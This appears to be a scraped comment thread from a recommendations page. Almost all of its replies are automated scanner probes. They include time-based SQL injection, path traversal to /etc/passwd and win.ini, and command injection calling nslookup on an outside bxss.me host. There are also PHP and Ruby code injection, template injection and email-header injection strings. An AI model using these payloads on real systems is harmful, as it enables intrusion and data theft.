./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727140361

re: Leo Saito

'.print(md5(31337)).'

1727140361

re: Leo Saito

'"

1727140362

re: Leo Saito

|(nslookup hitishiavxdaz7cf0c.bxss.me||perl -e "gethostbyname('hitishiavxdaz7cf0c.bxss.me')")

1727140362

re: Leo Saito

bxss.me

1727140362

re: Leo Saito

file:///etc/passwd

1727140362

re: Leo Saito

<!--

1727140362

re: Leo Saito

`(nslookup hityyietmbcpif9c13.bxss.me||perl -e "gethostbyname('hityyietmbcpif9c13.bxss.me')")`

1727140362

re: Leo Saito

/\../\../\../\../\../\../\../etc/passwd

1727140363

re: Leo Saito

;(nslookup hitwfdbofzoiebffec.bxss.me||perl -e "gethostbyname('hitwfdbofzoiebffec.bxss.me')")|(nslookup hitwfdbofzoiebffec.bxss.me||perl -e "gethostbyname('hitwfdbofzoiebffec.bxss.me')")&(nslookup hitwfdbofzoiebffec.bxss.me||perl -e "gethostbyname('hitwfdbofzoiebffec.bxss.me')")

1727140363

re: Leo Saito

/WEB-INF/web.xml

1727140364

re: Leo Saito

C:\WINDOWS\system32\drivers\etc\hosts

1727140364

re: Leo Saito

../../../../../../../../../../windows/win.ini%00.jpg

1727140365

re: Leo Saito

/../../../../../../../../../../boot.ini

1727140366

re: Leo Saito

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727140367

re: Leo Saito

..\..\..\..\..\..\..\..\windows\win.ini

1727140367

re: Leo Saito

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727140368

re: Leo Saito

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727140369

re: Leo Saito

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727140370

re: Leo Saito

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727140370

re: Leo Saito

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727140371

re: Leo Saito

WEB-INF/web.xml

1727140372

re: Leo Saito

WEB-INF\web.xml

1727140373

re: Leo Saito

1

1727140872

re: Leo Saito

1

1727140882

re: Leo Saito

-1 OR 2+620-620-1=0+0+0+1 --

1727140882

re: Leo Saito

-1 OR 3+620-620-1=0+0+0+1 --

1727140883

re: Leo Saito

-1 OR 2+27-27-1=0+0+0+1

1727140883

re: Leo Saito

-1 OR 3+27-27-1=0+0+0+1

1727140883

re: Leo Saito

-1' OR 2+791-791-1=0+0+0+1 --

1727140883

re: Leo Saito

-1' OR 3+791-791-1=0+0+0+1 --

1727140884

re: Leo Saito

-1' OR 2+318-318-1=0+0+0+1 or 'fdv3rDng'='

1727140884

re: Leo Saito

-1' OR 3+318-318-1=0+0+0+1 or 'fdv3rDng'='

1727140884

re: Leo Saito

-1" OR 2+494-494-1=0+0+0+1 --

1727140884

re: Leo Saito

-1" OR 3+494-494-1=0+0+0+1 --

1727140885

re: Leo Saito

if(now()=sysdate(),sleep(15),0)

1727140894

re: Leo Saito

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727140903

re: Leo Saito

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727140912

re: Leo Saito

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727140922

re: Leo Saito

-1; waitfor delay '0:0:15' --

1727140931

re: Leo Saito

-1); waitfor delay '0:0:15' --

1727140940

re: Leo Saito

1 waitfor delay '0:0:15' --

1727140950

re: Leo Saito

DP1IrNTx'; waitfor delay '0:0:15' --

1727140961

re: Leo Saito

-5 OR 929=(SELECT 929 FROM PG_SLEEP(15))--

1727140972

re: Leo Saito

-5) OR 790=(SELECT 790 FROM PG_SLEEP(15))--

1727140982

re: Leo Saito

-1)) OR 318=(SELECT 318 FROM PG_SLEEP(15))--

1727140994

re: Leo Saito

5PVYbZcx' OR 821=(SELECT 821 FROM PG_SLEEP(15))--

1727141007

re: Leo Saito

kSIU7qAQ') OR 377=(SELECT 377 FROM PG_SLEEP(15))--

1727141019

re: Leo Saito

NVot5XhR')) OR 582=(SELECT 582 FROM PG_SLEEP(15))--

1727141033

re: Leo Saito

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141047

re: Leo Saito

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141062

re: Leo Saito

'||(select 1 from (select pg_sleep(15))x)||'

1727141077

re: Leo Saito

''||(select 1 from (select pg_sleep(15))x)||''

1727141092

re: Leo Saito

1'"

1727141093

re: Leo Saito

@@PEeEn

1727141094

Thanks all! Will try out the places listed.

1668135741 Reply
Add photos

re: Yee How

WU8Mrils

1697002505

re: Yee How

1*

1697002506

re: Yee How

1*

1697002506

re: Yee How

1*

1697002506

re: Yee How

1*

1697002506

re: Yee How

-1 OR 2+359-359-1=0+0+0+1

1697002507

re: Yee How

-1 OR 3+359-359-1=0+0+0+1

1697002507

re: Yee How

if(now()=sysdate(),sleep(15),0)

1697002512

re: Yee How

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002516

re: Yee How

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002520

re: Yee How

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002525

re: Yee How

-1; waitfor delay '0:0:15' --

1697002529

re: Yee How

-1); waitfor delay '0:0:15' --

1697002533

re: Yee How

1 waitfor delay '0:0:15' --

1697002537

re: Yee How

3pdtxfzm'; waitfor delay '0:0:15' --

1697002542

re: Yee How

-5 OR 560=(SELECT 560 FROM PG_SLEEP(15))--

1697002547

re: Yee How

-5) OR 453=(SELECT 453 FROM PG_SLEEP(15))--

1697002552

re: Yee How

-1)) OR 113=(SELECT 113 FROM PG_SLEEP(15))--

1697002557

re: Yee How

8twPQgSG' OR 46=(SELECT 46 FROM PG_SLEEP(15))--

1697002561

re: Yee How

TrbkL8wf') OR 85=(SELECT 85 FROM PG_SLEEP(15))--

1697002566

re: Yee How

DOmxwffP')) OR 127=(SELECT 127 FROM PG_SLEEP(15))--

1697002571

re: Yee How


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002575

re: Yee How


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002579

re: Yee How

'||(select 1 from (select pg_sleep(15))x)||'

1697002584

re: Yee How

''||(select 1 from (select pg_sleep(15))x)||''

1697002588

re: Yee How

1'"

1697002588

re: Yee How

@@lXSEI

1697002589

re: Yee How

xZOvynwo

1697002734

re: Yee How

1*

1697002734

re: Yee How

1*

1697002735

re: Yee How

1*

1697002735

re: Yee How

1*

1697002735

re: Yee How

-1 OR 2+118-118-1=0+0+0+1

1697002736

re: Yee How

-1 OR 3+118-118-1=0+0+0+1

1697002736

re: Yee How

if(now()=sysdate(),sleep(15),0)

1697002741

re: Yee How

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002745

re: Yee How

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002749

re: Yee How

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002753

re: Yee How

-1; waitfor delay '0:0:15' --

1697002758

re: Yee How

-1); waitfor delay '0:0:15' --

1697002762

re: Yee How

1 waitfor delay '0:0:15' --

1697002767

re: Yee How

e1Vs0SJG'; waitfor delay '0:0:15' --

1697002770

re: Yee How

-5 OR 235=(SELECT 235 FROM PG_SLEEP(15))--

1697002774

re: Yee How

-5) OR 762=(SELECT 762 FROM PG_SLEEP(15))--

1697002778

re: Yee How

-1)) OR 966=(SELECT 966 FROM PG_SLEEP(15))--

1697002782

re: Yee How

u6yuCxT9' OR 282=(SELECT 282 FROM PG_SLEEP(15))--

1697002786

re: Yee How

lSfy3UGx') OR 441=(SELECT 441 FROM PG_SLEEP(15))--

1697002790

re: Yee How

xhQFmbqt')) OR 987=(SELECT 987 FROM PG_SLEEP(15))--

1697002794

re: Yee How


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002798

re: Yee How


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002802

re: Yee How

'||(select 1 from (select pg_sleep(15))x)||'

1697002806

re: Yee How

''||(select 1 from (select pg_sleep(15))x)||''

1697002810

re: Yee How

1'"

1697002810

re: Yee How

@@56Xul

1697002811

re: Yee How

1dncNvMLO

1727140302

re: Yee How

%0abcc:074625.67-13194.67.7f50c.19990.2@bxss.me

1727140305

re: Yee How

response.write(9622512*9266926)

1727140305

re: Yee How

to@example.com>%0d%0abcc:074625.67-13252.67.7f50c.19990.2@bxss.me

1727140305

re: Yee How

'+response.write(9622512*9266926)+'

1727140306

re: Yee How

<esi:include src="http://bxss.me/rpb.png"/>

1727140306

re: Yee How

"+response.write(9622512*9266926)+"

1727140307

re: Yee How

${9999855+9999104}

1727140307

re: Yee How

../../../../../../../../../../../../../../etc/passwd

1727140309

re: Yee How

../../../../../../../../../../../../../../windows/win.ini

1727140310

re: Yee How

file:///etc/passwd

1727140310

re: Yee How

../../../../../../../../../../../../../../../proc/version

1727140312

re: Yee How

'.gethostbyname(lc('hitdj'.'pitwljwk5a30a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(71).chr(103).chr(75).'

1727140312

re: Yee How

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727140313

re: Yee How

".gethostbyname(lc("hitae"."zfafrdeo90560.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(81).chr(122).chr(74)."

1727140313

re: Yee How

)

1727140313

re: Yee How

../../../../../../../../../../etc/passwd%00.jpg

1727140313

re: Yee How

!(()&&!|*|*|

1727140314

re: Yee How

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727140314

re: Yee How

^(#$!@#$)(()))******

1727140315

re: Yee How

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727140315

re: Yee How

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727140316

re: Yee How

/etc/passwd

1727140317

re: Yee How

%2fetc%2fpasswd

1727140318

re: Yee How

echo vpvhuu$()\ xgovju\nz^xyu||a #' &echo vpvhuu$()\ xgovju\nz^xyu||a #|" &echo vpvhuu$()\ xgovju\nz^xyu||a #

1727140319

re: Yee How

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727140319

1727140319

re: Yee How

"+"A".concat(70-3).concat(22*4).concat(113).concat(87).concat(116).concat(88)+(require"socket"
Socket.gethostbyname("hittg"+"zazckbhfdef9d.bxss.me.")[3].to_s)+"

1727140319

re: Yee How

/.././.././.././.././.././.././.././../etc/./passwd%00

1727140319

re: Yee How

&echo fprlep$()\ ceyhhv\nz^xyu||a #' &echo fprlep$()\ ceyhhv\nz^xyu||a #|" &echo fprlep$()\ ceyhhv\nz^xyu||a #

1727140320

re: Yee How

bxss.me/t/xss.html?%00

1727140320

re: Yee How

'+'A'.concat(70-3).concat(22*4).concat(122).concat(66).concat(105).concat(78)+(require'socket'
Socket.gethostbyname('hitli'+'vzxlvima0b3d8.bxss.me.')[3].to_s)+'

1727140321

re: Yee How

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727140321

re: Yee How

|echo myrnhq$()\ xdvllv\nz^xyu||a #' |echo myrnhq$()\ xdvllv\nz^xyu||a #|" |echo myrnhq$()\ xdvllv\nz^xyu||a #

1727140321

re: Yee How

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727140322

re: Yee How

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727140322

re: Yee How

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727140322

re: Yee How

(nslookup hitrgwlfawyfi85eb0.bxss.me||perl -e "gethostbyname('hitrgwlfawyfi85eb0.bxss.me')")

1727140322

1727140323

re: Yee How

';print(md5(31337));$a='

1727140323

re: Yee How

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727140323

re: Yee How

$(nslookup hituqpldktbau65bf8.bxss.me||perl -e "gethostbyname('hituqpldktbau65bf8.bxss.me')")

1727140323

1727140324

re: Yee How

";print(md5(31337));$a="

1727140324

re: Yee How

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727140324

re: Yee How

'"

1727140324

re: Yee How

&nslookup hitnvfzygootp4843f.bxss.me&'\"`0&nslookup hitnvfzygootp4843f.bxss.me&`'

1727140324

re: Yee How

/etc/shells

1727140325

re: Yee How

${@print(md5(31337))}

1727140326

re: Yee How

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727140326

re: Yee How

<!--

1727140326

re: Yee How

&(nslookup hitqsbghokeux79e1b.bxss.me||perl -e "gethostbyname('hitqsbghokeux79e1b.bxss.me')")&'\"`0&(nslookup hitqsbghokeux79e1b.bxss.me||perl -e "gethostbyname('hitqsbghokeux79e1b.bxss.me')")&`'

1727140326

re: Yee How

c:/windows/win.ini

1727140327

re: Yee How

${@print(md5(31337))}\

1727140327

re: Yee How

file:///etc/passwd

1727140327

re: Yee How

|(nslookup hitakzlhpkopm51c1d.bxss.me||perl -e "gethostbyname('hitakzlhpkopm51c1d.bxss.me')")

1727140328

re: Yee How

bxss.me

1727140328

re: Yee How

'.print(md5(31337)).'

1727140328

re: Yee How

/\../\../\../\../\../\../\../etc/passwd

1727140329

re: Yee How

`(nslookup hitxevkzbazhhb8298.bxss.me||perl -e "gethostbyname('hitxevkzbazhhb8298.bxss.me')")`

1727140329

re: Yee How

/WEB-INF/web.xml

1727140330

re: Yee How

;(nslookup hitjonqyyjzode3590.bxss.me||perl -e "gethostbyname('hitjonqyyjzode3590.bxss.me')")|(nslookup hitjonqyyjzode3590.bxss.me||perl -e "gethostbyname('hitjonqyyjzode3590.bxss.me')")&(nslookup hitjonqyyjzode3590.bxss.me||perl -e "gethostbyname('hitjonqyyjzode3590.bxss.me')")

1727140330

re: Yee How

C:\WINDOWS\system32\drivers\etc\hosts

1727140331

re: Yee How

../../../../../../../../../../windows/win.ini%00.jpg

1727140332

re: Yee How

/../../../../../../../../../../boot.ini

1727140333

re: Yee How

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727140335

re: Yee How

..\..\..\..\..\..\..\..\windows\win.ini

1727140335

re: Yee How

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727140336

re: Yee How

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727140339

re: Yee How

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727140340

re: Yee How

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727140341

re: Yee How

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.